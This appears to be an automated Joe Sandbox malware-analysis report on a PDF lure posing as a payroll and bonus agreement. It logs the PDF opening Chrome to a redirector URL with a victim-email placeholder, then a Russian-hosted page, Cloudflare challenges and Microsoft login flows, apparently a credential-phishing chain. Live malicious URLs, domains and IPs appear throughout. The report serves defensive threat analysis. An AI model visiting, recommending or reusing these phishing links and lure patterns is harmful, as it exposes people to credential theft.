Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engineClassification label: mal48.winPDF@33/123@43/15
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-08 08-48-05-845.logJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Selvi Payroll Benefits & Bonus Agreementfdp.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1520,i,5443044251436294696,11172737723768738417,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://warrior-empire.com/res444.php?4-68747470733a2f2f5050782e6d757369637374726576626e672e72752f417834454d2f2346-##victimemail##
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2184,i,72692833657749042,4424346579211033775,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1520,i,5443044251436294696,11172737723768738417,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2184,i,72692833657749042,4424346579211033775,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Selvi Payroll Benefits & Bonus Agreementfdp.pdfInitial sample: PDF keyword /JavaScript count = 0
Source: Selvi Payroll Benefits & Bonus Agreementfdp.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
Source: Selvi Payroll Benefits & Bonus Agreementfdp.pdfInitial sample: PDF keyword obj count = 50
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
System Information Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ru/eiplrjzzfrejlblaunoeneKVeqNiYCDPZXKMQJICCTDCGMWODAHEQACYBMXECL0%Avira URL Cloudsafe
https://PPx.musicstrevbng.ru/Ax4EM/#F0%Avira URL Cloudsafe
https://warrior-empire.com/res444.php?4-68747470733a2f2f5050782e6d757369637374726576626e672e72752f417834454d2f2346-0%Avira URL Cloudsafe
https://ppx.musicstrevbng.ru/favicon.ico0%Avira URL Cloudsafe
https://ppx.musicstrevbng.ru/Ax4EM/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ru
104.21.82.188
truefalse
    unknown
    bg.microsoft.map.fastly.net
    199.232.214.172
    truefalse
      high
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        code.jquery.com
        151.101.130.137
        truefalse
          high
          cdnjs.cloudflare.com
          104.17.25.14
          truefalse
            high
            challenges.cloudflare.com
            104.18.95.41
            truefalse
              high
              warrior-empire.com
              103.83.194.55
              truefalse
                unknown
                ppx.musicstrevbng.ru
                188.114.96.3
                truetrue
                  unknown
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    high
                    sni1gl.wpc.omegacdn.net
                    152.199.21.175
                    truefalse
                      high
                      www.google.com
                      172.217.18.4
                      truefalse
                        high
                        www.office.com
                        unknown
                        unknownfalse
                          high
                          x1.i.lencr.org
                          unknown
                          unknownfalse
                            high
                            aadcdn.msftauth.net
                            unknown
                            unknownfalse
                              high
                              identity.nel.measure.office.net
                              unknown
                              unknownfalse
                                high
                                login.microsoftonline.com
                                unknown
                                unknownfalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  https://warrior-empire.com/res444.php?4-68747470733a2f2f5050782e6d757369637374726576626e672e72752f417834454d2f2346-false
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ppx.musicstrevbng.ru/favicon.icofalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1616110350:1736343072:QTukKO-3rnkh5oSMj4bmwfvqfLwGTNfL7xuiRGubg6s/8feca7eefaf042bb/ghySCgmgzWFOmDPDrS26.j0yKRYwxDxH8pEt0ykykzM-1736344220-1.1.1.1-2XIMhubvoLlhHuebeEIOvK9GTQZzT7N5Q9E3GGq2qaz955cD2DXnSYumL7LUYM33false
                                    high
                                    https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                      high
                                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                        high
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8feca7eefaf042bb/1736344221782/d00671299b791ce228010dbde9ff40dbe716ec779dfb4c031bfbbfe8e91f0180/YC-1qhwLFuhwYEGfalse
                                          high
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8feca4d8fcf5c334/1736344095999/71f33037ddeb4c17610da78161a65f15caeef44e2fdd5a060d33437a6ec55faf/cP1eZ3Z_qm1xGs0false
                                            high
                                            https://ppx.musicstrevbng.ru/Ax4EM/#F#G##victimemail##false
                                              unknown
                                              https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.jsfalse
                                                high
                                                https://mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ru/eiplrjzzfrejlblaunoeneKVeqNiYCDPZXKMQJICCTDCGMWODAHEQACYBMXECLfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1458064514:1736343034:52qvS4QZlucpCjw1o58GpHxbb9QYG5bJ4eBnVmkvgEM/8feca4d8fcf5c334/1dU0s4F1Ep2lbLh0x7M39CDUdfPkLdJ1QAbJtTjPcOQ-1736344093-1.1.1.1-3WBI7L6bOC4JxokpayZrdTQ_s99FIE4loiGfSZZQkl4cfpT6NnlCygwihpGHh59rfalse
                                                  high
                                                  https://a.nel.cloudflare.com/report/v4?s=CysqjPtP%2B1eWl3zHEJhJCDoXMSsdDiPXqR273IDOLvk6SCGDoOPH9b7kCPx8M129Aa5AjRjGQK16K61rSIUxTk9exKcIZlm8U09kMhkWeLv2R9LEs6tMRMjCPFlmwQ%3D%3Dfalse
                                                    high
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8feca7eefaf042bb/1736344221782/yp26R9IhIYuAHhofalse
                                                      high
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/false
                                                        high
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8feca4d8fcf5c334/1736344096000/ynYn-Mf8eQqp7b8false
                                                          high
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8feca4d8fcf5c334&lang=autofalse
                                                            high
                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                                              high
                                                              https://ppx.musicstrevbng.ru/Ax4EM/true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719410425060947.NDFhMWVmMzItY2ZlMS00ODhmLWE1ZGUtYzI3OGE5ZDQ1ZmE0YzRkZWQ1ZGQtNzY1MS00MGRlLWEwMzEtZGFkOTYyNWQ2NDhh&ui_locales=en-US&mkt=en-US&client-request-id=e1a1eeff-d7ab-4fe2-a22c-e0c6c767a1d6&state=b-VdhWSWw4tsGh-S7wmqhfbPFGYjkz20qNsukDhCDTL3SU53vsJ8g9qc-GKCYzAJ7DMmSdKZ3eljPX7ZQQ6j8oYvT01IUkLoNtOlhG1P5OfRfLYpZFdYm_kPfoJNBC46rJz3NK-mqRGGDullAgSFQsR-vsEwgrMwWOYE52zkZtqoM-hTvE6O7HPvlIcjOP8spprlL_FEQrtkXgScFk1AZUxJY4EkME53AweNGX5xXZROPUwd_CqnWhDTZhDrGvR39is2uBBuXKSH515RU4VV0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                                                high
                                                                https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719410425060947.NDFhMWVmMzItY2ZlMS00ODhmLWE1ZGUtYzI3OGE5ZDQ1ZmE0YzRkZWQ1ZGQtNzY1MS00MGRlLWEwMzEtZGFkOTYyNWQ2NDhh&ui_locales=en-US&mkt=en-US&client-request-id=e1a1eeff-d7ab-4fe2-a22c-e0c6c767a1d6&state=b-VdhWSWw4tsGh-S7wmqhfbPFGYjkz20qNsukDhCDTL3SU53vsJ8g9qc-GKCYzAJ7DMmSdKZ3eljPX7ZQQ6j8oYvT01IUkLoNtOlhG1P5OfRfLYpZFdYm_kPfoJNBC46rJz3NK-mqRGGDullAgSFQsR-vsEwgrMwWOYE52zkZtqoM-hTvE6O7HPvlIcjOP8spprlL_FEQrtkXgScFk1AZUxJY4EkME53AweNGX5xXZROPUwd_CqnWhDTZhDrGvR39is2uBBuXKSH515RU4VV0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                                                  high
                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8feca7eefaf042bb&lang=autofalse
                                                                    high
                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.2.drfalse
                                                                      high
                                                                      https://login.windows-ppe.netchromecache_226.6.dr, chromecache_215.6.drfalse
                                                                        high
                                                                        https://login.microsoftonline.comchromecache_226.6.dr, chromecache_215.6.drfalse
                                                                          high
                                                                          https://PPx.musicstrevbng.ru/Ax4EM/#Fchromecache_247.6.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.18.94.41
                                                                          unknownUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          172.67.162.59
                                                                          unknownUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          151.101.130.137
                                                                          code.jquery.comUnited States
                                                                          54113FASTLYUSfalse
                                                                          104.21.82.188
                                                                          mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ruUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          151.101.66.137
                                                                          unknownUnited States
                                                                          54113FASTLYUSfalse
                                                                          142.250.186.132
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          35.190.80.1
                                                                          a.nel.cloudflare.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          172.217.18.4
                                                                          www.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          103.83.194.55
                                                                          warrior-empire.comUnited States
                                                                          132335NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINfalse
                                                                          104.18.95.41
                                                                          challenges.cloudflare.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          239.255.255.250
                                                                          unknownReserved
                                                                          unknownunknownfalse
                                                                          188.114.96.3
                                                                          ppx.musicstrevbng.ruEuropean Union
                                                                          13335CLOUDFLARENETUStrue
                                                                          104.17.25.14
                                                                          cdnjs.cloudflare.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          IP
                                                                          192.168.2.4
                                                                          192.168.2.5
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1585938
                                                                          Start date and time:2025-01-08 14:47:11 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 5m 28s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:defaultwindowspdfcookbook.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:13
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:Selvi Payroll Benefits & Bonus Agreementfdp.pdf
                                                                          Detection:MAL
                                                                          Classification:mal48.winPDF@33/123@43/15
                                                                          EGA Information:Failed
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 0
                                                                          • Number of non-executed functions: 0
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .pdf
                                                                          • Found PDF document
                                                                          • Close Viewer
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 184.28.88.176, 142.250.186.67, 142.250.186.110, 66.102.1.84, 172.64.41.3, 162.159.61.3, 172.217.18.14, 142.250.181.238, 23.209.209.135, 3.233.129.217, 52.22.41.97, 3.219.243.226, 52.6.155.20, 199.232.214.172, 2.16.168.107, 2.16.168.105, 192.229.221.95, 142.250.186.174, 142.250.185.238, 142.250.186.46, 142.250.185.78, 216.58.206.78, 142.250.184.195, 172.217.23.110, 142.250.184.238, 142.250.185.206, 172.217.16.206, 20.190.160.17, 20.190.160.14, 40.126.32.140, 20.190.160.22, 40.126.32.136, 40.126.32.138, 40.126.32.133, 40.126.32.72, 13.107.6.156, 2.16.238.152, 2.16.238.149, 40.126.32.74, 40.126.32.76, 40.126.32.68, 20.190.160.20, 40.126.32.134, 216.58.212.170, 142.250.186.106, 142.250.185.74, 142.250.184.234, 216.58.206.74, 142.250.185.106, 142.250.185.138, 142.250.186.74, 142.250.186.170, 142.250.185.170, 142.250.185.234, 172.217.18.10, 172.217.16.202, 172.217.18.106, 142.250.185.202, 142.250.186.42, 20.50.73.9, 20.52.64.201, 2.16.164.105, 2.16.164.72, 23.56.254.164, 23
